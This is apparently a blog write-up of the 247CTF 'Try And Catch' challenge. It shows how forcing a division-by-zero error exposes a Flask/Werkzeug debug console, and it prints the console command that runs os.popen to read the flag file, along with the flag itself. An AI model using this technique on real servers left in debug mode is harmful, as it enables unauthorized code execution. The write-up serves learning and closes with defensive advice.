247CTF - Try And Catch

Posted on 2026-02-26 Edited on 2026-02-27 In ctf Views: Disqus: Word count in article: 127 Reading time ≈ 1 mins.

Find a bug and trigger an exception in a Flask web application to access the debug console.

Vulnerability

Flask debug mode with DebuggedApplication and evalex=True allows interactive code execution through the debugger console. The calculator endpoint accepts division operations and lacks proper exception handling.

Solution

Step 1: Trigger an Exception

Send a division by zero request to the calculator:

1	https://9894a61910fb83f2.247ctf.com/calculator?number_1=1&number_2=0&operation=%2f

Step 2: Execute Arbitrary Python

The debug console opens. Execute commands to read the flag:

1 2	>>> __import__('os').popen('cat ./flag.txt').read() '247CTF{0e310979093ef6309adcbcb418145200}\n'

Key Insight

Never enable Flask debug mode in production. The Werkzeug debugger with evalex=True provides a complete interactive Python console, allowing arbitrary code execution with the web server's privileges.

247CTF{0e310979093ef6309adcbcb418145200}